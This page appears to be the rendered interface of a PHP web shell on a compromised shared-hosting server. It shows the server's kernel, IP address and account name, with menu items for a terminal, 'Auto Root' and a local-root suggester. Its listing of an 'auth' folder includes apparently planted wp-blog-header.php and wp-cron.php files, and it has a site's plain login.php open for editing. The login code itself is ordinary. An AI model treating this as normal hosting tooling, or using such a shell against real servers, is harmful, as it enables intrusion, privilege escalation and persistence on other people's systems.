Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
data sycho /
auth /
Delete
Unzip
Name
Size
Permission
Date
Action
.htaccess
197
B
-r--r--r--
2026-04-01 03:43
login.php
4.41
KB
-rw-r--r--
2026-03-01 23:14
logout.php
90
B
-rw-r--r--
2026-03-01 20:28
register.php
5.37
KB
-rw-r--r--
2026-03-01 23:15
wp-blog-header.php
2.74
KB
-r--r--r--
2026-04-01 03:43
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
Save
Rename
<?php include '../includes/db.php'; session_start(); $error = ""; if (isset($_POST['login'])) { $email = $_POST['email']; $password = $_POST['password']; $stmt = $pdo->prepare("SELECT * FROM users WHERE email = ?"); $stmt->execute([$email]); $user = $stmt->fetch(); if ($user && password_verify($password, $user['password'])) { $_SESSION['user_id'] = $user['id']; $_SESSION['user_name'] = $user['name']; header('Location: ../dashboard.php'); exit; } else { $error = "Invalid identity or key. Access Denied."; } } ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Login | CodeBySycho</title> <link rel="stylesheet" href="../assets/css/style.css"> </head> <body style="min-height: 100vh; display: flex; align-items: center; justify-content: center; background: #fafafa; margin: 0; padding: 0;"> <div style="width: 100%; max-width: 480px; padding: 1.5rem;"> <div class="card admin-card" style="background: #ffffff; text-align: center; border: 1px solid rgba(0,0,0,0.05); box-shadow: 0 40px 100px rgba(0,0,0,0.05);"> <div style="margin-bottom: 3rem;"> <a href="../index.php" class="logo" style="display: block; margin-bottom: 2.5rem; font-size: 2rem; color: #0f172a; text-decoration: none;">CodeBy<span style="color: var(--primary);">Sycho</span></a> <h2 style="margin-bottom: 0.5rem; font-size: 1.8rem; font-weight: 800; color: #0f172a; letter-spacing: -1px;">Inbound Port</h2> <p style="color: #64748b; font-size: 0.95rem; font-weight: 500; line-height: 1.6;">Re-establish connectivity to your active development workspace.</p> </div> <?php if ($error): ?> <div style="background: #fee2e2; color: #991b1b; padding: 1.2rem; border-radius: 12px; margin-bottom: 2.5rem; font-size: 0.85rem; font-weight: 700; text-align: left;"> <i class="fas fa-exclamation-circle" style="margin-right: 0.8rem;"></i> <?php echo $error; ?> </div> <?php endif; ?> <form action="" method="POST"> <div class="form-group" style="margin-bottom: 1.5rem; text-align: left;"> <label style="display: block; margin-bottom: 0.8rem; font-size: 0.75rem; font-weight: 800; color: #475569; text-transform: uppercase; letter-spacing: 1.5px;">Credential ID</label> <input type="email" name="email" placeholder="name@company.com" required style="width: 100%; background: #f8fafc; border: 1px solid #e2e8f0; padding: 1rem; border-radius: 12px; color: #1e293b; font-size: 0.95rem; outline: none; transition: var(--transition); font-weight: 600;"> </div> <div class="form-group" style="margin-bottom: 2.5rem; text-align: left;"> <div style="display: flex; justify-content: space-between; align-items: center; margin-bottom: 0.8rem;"> <label style="font-size: 0.75rem; font-weight: 800; color: #475569; text-transform: uppercase; letter-spacing: 1.5px;">Security Key</label> <a href="#" style="font-size: 0.75rem; color: var(--primary); font-weight: 800; text-decoration: none;">Reset Key?</a> </div> <input type="password" name="password" placeholder="••••••••" required style="width: 100%; background: #f8fafc; border: 1px solid #e2e8f0; padding: 1rem; border-radius: 12px; color: #1e293b; font-size: 0.95rem; outline: none; transition: var(--transition); font-weight: 600;"> </div> <button type="submit" name="login" class="btn-primary" style="width: 100%; padding: 1.1rem; margin-bottom: 2rem; font-size: 1rem; border-radius: 15px; font-weight: 800; box-shadow: 0 10px 20px var(--primary-glow);">Authorize Access</button> </form> <p style="font-size: 0.9rem; color: #64748b; font-weight: 600;"> New operative? <a href="register.php" style="color: var(--primary); font-weight: 800; margin-left: 0.5rem; text-decoration: none; border-bottom: 2px solid var(--primary-glow);">Submit Application</a> </p> </div> </div> </body> </html>